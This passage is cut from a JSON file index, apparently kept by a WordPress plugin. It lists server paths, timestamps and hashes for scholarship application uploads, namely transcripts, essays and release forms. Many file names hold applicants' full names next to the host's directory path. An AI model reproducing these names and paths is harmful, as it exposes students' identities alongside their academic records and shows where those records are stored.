ds\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/JPhilogene_Transcript.pdf\":{\"d\":1520983184,\"h\":\"fd1635a0a5bb9dd9a1aa49edab5b76c9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/M.Smithson.Transcript.pdf\":{\"d\":1522379074,\"h\":\"18fb26bb45f45fbf6e99cd59d73fbb9b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Photo-Release-Form1.pdf\":{\"d\":1522078812,\"h\":\"5703b9cfeb83f67fa6137feb4e47e4da\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/unoffical-transcript.pdf\":{\"d\":1522518749,\"h\":\"3b72d358a45935c8b85f89862cb86623\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Mercy-Ayaba_scholarship-application-essay-2.docx\":{\"d\":1522090894,\"h\":\"07df7d82c22543214bce6b79a7388607\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/LGZScholarshipReleaseFormEdit.pdf\":{\"d\":1522518664,\"h\":\"131f159001a8c6e010b76719bac1990c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Kyton-Ovide-Release-Form.pdf\":{\"d\":1520979070,\"h\":\"f6651299c3f0c94f6acff11eb448c8cd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/scan0017.pdf\":{\"d\":1522553705,\"h\":\"a2422cfcc654b86199e70569bcce648d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/HoCo-Transcripts.pdf\":{\"d\":1522369381,\"h\":\"19badb973a7cb9e8ed871f984bd4f0fb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/transcript.docx\":{\"d\":1522518675,\"h\":\"934d39568df710c793e5b9c952f8edda\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Transcript1.pdf\":{\"d\":1522089948,\"h\":\"f36df20ef883ac0d7dbece0f018944a4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Photo-Release-Form2.pdf\":{\"d\":1522508262,\"h\":\"6917dc683ddd34a75c8a89f299b81d62\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Photo-Release-Form.pdf\":{\"d\":1521063526,\"h\":\"8f6642f5f2056b5929c53d4a8701c9f6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Unofficial-HS-Transcript.pdf\":{\"d\":1521063526,\"h\":\"1bb528b86e916ba434b7a07c8bef2416\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Release-Form.pdf\":{\"d\":1522089948,\"h\":\"de4cffd6ea1fbd1e9f4625d995ae7f24\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Scan-Mar-30-2018-at-10_36-PM.pdf\":{\"d\":1522463980,\"h\":\"04a26f6d74ba5d7cb1942a6042fd4685\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Transcript.pdf\":{\"d\":1522078812,\"h\":\"c524df6c2c3fb6bed2ef24f20de63f86\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/JPhilogene_photorelease.pdf\":{\"d\":1520983378,\"h\":\"d6ff73ce094da522112e561a3d8c5fc8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Maya-Smithson-Ruth-W.-Conway-Scholarship-Essay.docx\":{\"d\":1522379074,\"h\":\"44348d1dbd19d8bf2ca4073946684b8c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/W-Ruth-Conway-scholarship.docx\":{\"d\":1522433595,\"h\":\"bffec897c5b0e18ce9a13ee3fd851963\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Copy-of-transcripts.pdf\":{\"d\":1522007779,\"h\":\"f9d65c5808ab4719111402ff1674bb95\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/ZPB-Media-Release.pdf\":{\"d\":1522506417,\"h\":\"4b6fcb226cb733bec6576a04dfd24888\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Alex-Transcript-jan-18.pdf\":{\"d\":1522547511,\"h\":\"8862987a1d51eefa6586d0dd69a31645\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Scan03112018170307.pdf\":{\"d\":1520996384,\"h\":\"44b1dd537fc493a7b97f3cf4debbb624\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Scholarship-essay.docx\":{\"d\":1522110511,\"h\":\"932ee63ed84341bd2153bf9e545f89dc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Lauryn-Williams-Essay.docx\":{\"d\":1522078812,\"h\":\"181192f41b8c0b9a9f02b323da10fe63\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Release-form-page-2.pdf\":{\"d\":1522433595,\"h\":\"bf4316af9657a09d2a7d13caf1361b21\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Ruth-Conway-Scholarship-Essay.docx\":{\"d\":1521063526,\"h\":\"e81e57f54969ab8b94a36ecf15f6dde9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/LGZScholarshipReleaseForm.pdf\":{\"d\":1522090894,\"h\":\"cf7a4e20cd8de0a23c5140b5a06b92ba\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/transcript.pdf\":{\"d\":1522556208,\"h\":\"4dd9834b9360225119d8128cb0a0d74d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/scan0001.pdf\":{\"d\":1522547511,\"h\":\"f1fda6ee30c340a3fc920703307d4f39\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/release-form.pdf\":{\"d\":1522556208,\"h\":\"d9795c8d113dbe1ca2a8c97e94814433\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/essay-for-scholar.pdf\":{\"d\":1522556208,\"h\":\"555ec846edb5cdf4890d4bf8efdb88a8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Scan-Mar-30-2018-at-9_19-PM.pdf\":{\"d\":1522463713,\"h\":\"8b033ad5146b4aa7b85789653b4710e5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Doc2.pdf\":{\"d\":1522455365,\"h\":\"2f4229393e11c84919dc8172de962f3c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Unofficial-Transcript.pdf\":{\"d\":1522433595,\"h\":\"2dd54cb2cab374d3b43680e682450026\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/RuthConwayScholarship_NinaBundy_Essay.pdf\":{\"d\":1522541050,\"h\":\"9cda165d1f66537f5970b1c1fdeace61\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/JPhilogene_WRConway.docx\":{\"d\":1520983184,\"h\":\"c55ae84f7b2af9bec5150bb70872b67d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Alexandra-Alston-Ruth-Conway-Scholarship.docx\":{\"d\":1522547511,\"h\":\"56cd2207901efda3c4486588c77a01dd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Doc1.pdf\":{\"d\":1522455365,\"h\":\"5d83fa69424414ff8f5c062326a06242\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Zeta-Phi-Beta-College-Degree-Impact-Future.docx\":{\"d\":1522506417,\"h\":\"2f5e33b0f01ff5fd3a869ea3f46e3099\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/NinaBundy_HowardHighTranscript_2018.pdf\":{\"d\":1522541050,\"h\":\"90b15fb73138a3a5be62a36f5631ac60\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/scan0011.pdf\":{\"d\":1522553705,\"h\":\"0b02bd0ae7fedcdf6e5c9ba3eb40a824\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/SCH-Advisor-Handbook2.pdf\":{\"d\":1520942938,\"h\":\"4c5834249377516dc60a4ae517c3978f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/SCH-Advisor-Handbook.pdf\":{\"d\":1520942773,\"h\":\"4c5834249377516dc60a4ae517c3978f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/LGZScholarshipReleaseForm1.pdf\":{\"d\":1522451349,\"h\":\"69fc91c5d04fb06696156bb08effdaef\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/LGZ-essay.pdf\":{\"d\":1522451349,\"h\":\"f84bdbe5e7eaba6f51293f5ee7973c4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/schol-release.docx\":{\"d\":1522007927,\"h\":\"9b1c19c631dc00be479665534163ae98\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/WOMEN-SCHOLARSHIP.docx\":{\"d\":1522518664,\"h\":\"680168e01b249b7f5be55576c5ebfa59\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Unofficial-Transcript1.pdf\":{\"d\":1522508262,\"h\":\"7a5c9c5931162f26a6b2db93f1f490c1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/ZETA-PHI-BETA.pdf\":{\"d\":1521047774,\"h\":\"dc6e275c740d20f8c582257d3b578dba\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Community-Service-Scholarship-essay.docx\":{\"d\":1522007779,\"h\":\"ea93770e8d050b29e0f93888d12523b8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/M.SmithsonPhotoRelease.pdf\":{\"d\":1522379134,\"h\":\"b0608d946e2ec2266d4574302c1d5f9e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/new-doc-2017-12-15-16.35.38-20180314130326.pdf\":{\"d\":1521047774,\"h\":\"f10b5f16ce633c4a6062dcaa59960b05\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Chelsea-Ofori-transcript-2.pdf\":{\"d\":1522110975,\"h\":\"160697f85729b52b6ca4d039e40f9fb9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Ruth-Conway-Scholarship-Essay.pdf\":{\"d\":1522463713,\"h\":\"467987ce86cf1db00a4ba2fbd632a6b8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/W.-Ruth-Conway-Scholarship-Essay-Summer-Williams.pdf\":{\"d\":1522507985,\"h\":\"000306549f29317bed09d83e0d487d61\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/SCH-Advisor-Handbook1.pdf\":{\"d\":1520942837,\"h\":\"4c5834249377516dc60a4ae517c3978f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Kyton-Ovide-Transcript.pdf\":{\"d\":1520979070,\"h\":\"96a9dee7814097645847ce28dc80aa50\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/03\\/Scan_0005.pdf\":{\"d\":1522110975,\"h\":\"e3314baa51bd7b973694c9ce5a4eba0a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/12\\/index.html\":{\"d\":1568875866,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/02\\/index.html\":{\"d\":1568875866,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/01\\/index.html\":{\"d\":1568875866,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2018\\/index.html\":{\"d\":1568875866,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2017\\/08\\/index.html\":{\"d\":1568875866,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2017\\/08\\/High-School-2017-18-Scholarship-Application-Package-draft.docx\":{\"d\":1502456025,\"h\":\"296670dc8134eca8e82e3ad3baa223e3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2017\\/08\\/HCC-2017-18-Scholarship-Application-Package-draft.docx\":{\"d\":1502456025,\"h\":\"e92c5877c032e4880efb36693587d811\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2017\\/12\\/index.html\":{\"d\":1568875866,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2017\\/index.html\":{\"d\":1568875866,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/EPSON302.PDF\":{\"d\":1552957276,\"h\":\"57dea7ff5cd084df7371b34bf42bdf89\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/W-Ruth-Conway-Photo-Release-Form.pdf\":{\"d\":1553807827,\"h\":\"76d8ae9c8729a07ca40fc27081130f79\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Release-form.pdf\":{\"d\":1553918246,\"h\":\"32c65e19221db8983f4757148dcfd89e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/W.-Ruth-Conway-Scholarship-Essay-David-Gordon.docx\":{\"d\":1553372077,\"h\":\"295d047072fb4adce4a45af58dbe9679\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/index.html\":{\"d\":1568875866,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/W.-Ruth-Conway-Essay-2.pdf\":{\"d\":1553916932,\"h\":\"e64b0fa8858621469f7129eb2a28fb75\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Julian-E-Basena_-Ruth-Conway-Scholarship-Essay.pdf\":{\"d\":1553802596,\"h\":\"2a730ae35b444b820ec40b65f898fdbc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Scanned-Documents-2.pdf\":{\"d\":1551894054,\"h\":\"1375283eed2f73b4214da5a5f92f36dd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/release.pdf\":{\"d\":1553881413,\"h\":\"e145bc01f44e460206d397585a5b456b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/MYoung-Transcripts.docx\":{\"d\":1553820740,\"h\":\"49d6f1671be827e46347214db89636f3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Essay-Option-2.docx\":{\"d\":1551893735,\"h\":\"eb5a5a0c1b8774e79c8a8b42bceffa5d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Copy-of-Transcipt.pdf\":{\"d\":1553829781,\"h\":\"282371f75410fbbb9539e6aae4ff4ae7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Transcript-2.pdf\":{\"d\":1553817318,\"h\":\"b74cc0e985fed047351eee11eaea40b5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/W-Ruth-Conway-Essay.docx\":{\"d\":1553798820,\"h\":\"d3f3d74ece82dfd3aab8b98c5d974cf0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/W-Ruth-Conway-Essay.pdf\":{\"d\":1553650794,\"h\":\"e66d7776d1c851667d871c4ac9899dfe\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Unofficial-transcript.pdf\":{\"d\":1553892082,\"h\":\"22c27450e97cbfc99f899c316af845b8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/ruth-conway-essay.docx\":{\"d\":1553881265,\"h\":\"5ebf051395eed24a6300b52a2ccc3573\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Layla-Foster-Transcript-2019.pdf\":{\"d\":1553632342,\"h\":\"ba63c86d849dfc7eaad6c8bc424a17b3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Scanned-Documents-21.pdf\":{\"d\":1553918278,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Conway-essay.pdf\":{\"d\":1553908125,\"h\":\"3c945f0ab9e2969b3f2a05994f2e070c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Scholarship-Supplements.docx\":{\"d\":1553829781,\"h\":\"dd3340f6d39619e2f345e652e721b8a4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Ruth-Conway-Scholarship-App.docx\":{\"d\":1553820740,\"h\":\"614af00ec3d6b2b37a8886baad1d2138\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Zeta-Release-Form.pdf\":{\"d\":1553469679,\"h\":\"eaa48ceee85b2e556e7a1549e91060c9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Scanned-Documents.pdf\":{\"d\":1553918278,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/photo_release.pdf\":{\"d\":1553819591,\"h\":\"1d242f8025fd5d7475cf383e25c5d424\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/MLYoung_Zeta-Photo-Release-Form.pdf\":{\"d\":1553820740,\"h\":\"c2303c84caa5791b3e4af7d0665c8b33\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/W.-Ruth-Scholarship.docx\":{\"d\":1553816422,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Documents-Ruth-Conway.pdf\":{\"d\":1553829324,\"h\":\"86beb3cf894fc8e854b8fa23f0fede00\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Nailahs-Transcript.pdf\":{\"d\":1553749673,\"h\":\"834c155f736b17aaaf59d8eb62c96da5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Release-Form.pdf\":{\"d\":1553648427,\"h\":\"e604a2c28312a443ff55aa783fae4b64\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Zeta-Phi-Beta-Scholarship-Release-David-Gordon.pdf\":{\"d\":1553372077,\"h\":\"61de807400c8046c180fe5e4cac68dae\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/release-Form-2.pdf\":{\"d\":1553817318,\"h\":\"11cb4e021bfbab1cc4de5618c2e6d6ae\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Transcript.pdf\":{\"d\":1553918246,\"h\":\"f04346596b515bacd97b71ef07526df4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Julian-E-Basena_-W-Ruth-Conway-Scholarship_-Release-Form.pdf\":{\"d\":1553802596,\"h\":\"b808281cb3860e83a10cafd2d571e33b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/releaseformscholarshipzeta.pdf\":{\"d\":1553749673,\"h\":\"529317b6b7aa2f971db12ac268180533\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/W.-Ruth-Conway-Essay.pdf\":{\"d\":1553648427,\"h\":\"94b366cfb6649dabfd7676d4611eb299\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2019\\/03\\/Ruth-Conway-ESSAY.pdf\":{\"d\":1553829324,\"h\":\"613d756f9e8ca88afde226310746962e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c742